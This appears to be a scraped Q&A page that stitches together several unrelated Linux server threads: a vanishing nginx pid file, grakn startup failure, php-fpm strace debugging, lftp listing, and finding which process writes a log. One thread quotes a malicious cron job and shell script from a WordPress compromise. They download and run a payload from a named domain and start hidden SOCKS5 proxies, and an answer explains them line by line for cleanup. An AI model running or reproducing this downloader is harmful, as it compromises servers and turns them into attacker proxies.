I lost nginx.pid,it disappeared - nginx

Here is part of my nginx.conf:
pid /www/nginx0836/nginx.pid;
While I restart nginx, in several seconds I run ls /www/nginx0836 and it lists nginx.pid.
But after several seconds, running ls /www/nginx0836 again, nginx.pid is not listed.
Why?
By the way, nginx server works well and when I run
ps -ef | grep "nginx: master process" | grep -v "grep" | awk -F ' ' '{print $2}'
then I can see nginx pid.

try monitoring folder with incrond and log any changes with $# $# on that directory.
may be you will see something like puppet or an rsync deleting the pid file.
/www/nginx0836 IN_DELETE echo "$# $#"
it will log any delete event on directory
simpler than audit...
sorry the poor english

Try default configuration for nginx, you will find similar problem here

Related

Not able to start grakn, Storage is not able to start

I have installed grakn on unix and earlier it was working fine but now giving issues as it is not able to start.
I tried to run it using below command:
./grakn server start
Getting below error.
Starting Storage-FAILED!
Unable to start Storage
Please run 'grakn server status' or check the logs located under 'logs' directory.
There may be lot of things happening under the hood. Without looking into logs this is hard to tell what exactly happening. You can try killing all the processes and then remove associate pids from /tmp/ directory. Then retry starting grakn server.
$ for KILLPID in `ps ax | grep 'grakn' | awk '{print $1}'`; do kill -9 $KILLPID; done
$ ps -ef | grep defunct | grep -v grep | cut -b8-20 | xargs kill -9
$ rm -rf /tmp/grakn-*
Let me know if it helps.

some malware that appeared on our site related to the recent wordpress attack

Apparently I site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
the file it was pulling is this (obviously, don't try to execute this...)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, It kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl which can be downloaded from sourceforge. The version used here differs from the sourceforge in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed on in on the command line. I suspect that the purpose of the latter change is make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and see if you see that command. If you do it, use the kill command to stop it.

How to debug php-fpm performance?

Webpages are loading very slow, it takes them around 6 seconds to even start sending the page data, which is then sent in a matter of 0.2 seconds and is generated in 0.19 seconds.
I doubt that it is caused by php or the browser, so the problem must be with the server which is handled by nginx and php5-fpm
A server admin said that indeed the problem was caused by a misconfigured fpm or nginx
How can I debug the cause of the slowdown?
Setup: php5.3, mysql5, linux, nginx, php5-fpm
This question is probably too broad for StackOverflow, as the question could span several pages and topics.
However if the question was just how do I do debug the performance of PHP-FPM then the answer would be much easier - use Strace and the script below.
#!/bin/bash
mkdir trc
rm -rf trc/*.trc
additional_strace_args="$1"
MASTER_PID=$(ps auwx | grep php-fpm | grep -v grep | grep 'master process' | cut -d ' ' -f 7)
summarise=""
#shows total of calls - comment in to get
#summarise="-c"
nohup strace -r $summarise -p $MASTER_PID -ff -o ./trc/master.follow.trc >"trc/master.$MASTER_PID.trc" 2>&1 &
while read -r pid;
do
if [[ $pid != $MASTER_PID ]]; then
#shows total of calls
nohup strace -r $summarise -p "$pid" $additional_strace_args >"trc/$pid.trc" 2>&1 &
fi
done < <(pgrep php-fpm)
read -p "Strace running - press [Enter] to stop"
pkill strace
That script will attach strace to all of the running php-fpm instances. Any requests to the web server that reach php-fpm will have all of their system calls logged, which will allow you to inspect which ones are taking the most time, which will allow you to figure out what needs optimising first.
On the other hand, if you can see from the Strace output that PHP-FPM is processing each request fast, it will also allow you to eliminate that as the problem, and allow you to investigate nginx, and how nginx is talking to PHP-FPM, which could also be the problem.
#Danack saved my life.
But I had to change the command to get the MASTER_PID:
MASTER_PID=$(ps auwx | grep php-fpm | grep -v grep | grep 'master process' | sed -e 's/ \+/ /g' | cut -d ' ' -f 2)

ls filename does not work in lftp

I created an lftp script to upload single files to a web hosting provider.
The use case is that I call it from the repository root, so the relative path is the same here and in the remote server.
#!/bin/bash
DIRNAME=$(dirname $1)
FILENAME=$(basename $1)
REPO_ROOT=$(pwd)
ABSOLUTE_PATH=${REPO_ROOT}/$1
lftp -u user,passwd -p port sftp://user#hosting <<EOF
cd $DIRNAME
put $ABSOLUTE_PATH
ls -l $FILENAME
quit 0
EOF
It works, with one small but annoying bug. To check that it really uploads the file, I have put an ls -l at the end. It fails and I do not understand why:
ls: Access failed: No such file(functions.php)
I tried to use rels and cache flush but in vain. I'm using lftp 4.0.9.
Some googling at last gave a result in mail-archive
It is a limitation of SFTP protocol implementation in lftp. It cannot
list a single file, only a specific directory.
Fortunately, lftp allows pipes, so
ls -l | grep "$FILENAME"
solves the problem.

How to identify which Daemon Process is writing to the file

I need to identify a daemon process that is writing to a log file periodically. The problem is that I dont have any idea which process is doing the job, and I need to show some progress to the client by tomorrow. Anybody has any clue?
I have already sorted out the daemon processes running in the system with the help of the PPID. Any help would be appreciated.
Also I think it is possible (rarely) for a daemon not to have a PPID as 1. How can we find it out then?
Try the fuser command on your log file, which will display the PIDs of processes using it.
Example:
$ fuser file.log
file.log: 3065
lsof gives a list of open files with the processes.
So lsof | grep <filename> should help you.
You can use auditctl.
# sudo apt-get install auditd
# sudo /sbin/auditctl -w /path/to/file -p war -k hosts-file
-w watch /etc/hosts
-p warx watch for write, attribute change, execute or read events
-k hosts-file is a search key.
# sudo /sbin/ausearch -f /path/to/file | more
Gives output such as
type=UNKNOWN[1327] msg=audit(1459766547.822:130): proctitle=2F7573722F7362696E2F61706163686532002D6B007374617274
type=PATH msg=audit(1459766547.822:130): item=0 name="/path/to/file" inode=141561 dev=08:00 mode=0100444 ouid=33 ogid=33 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1459766547.822:130): cwd="/"
type=SYSCALL msg=audit(1459766547.822:130): arch=c000003e syscall=2 success=yes exit=41 a0=7f3c23034cd0 a1=80000 a2=1b6 a3=8 items=1 ppid=24452 pid=6797 auid=42949672
95 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key="hosts-file"

Resources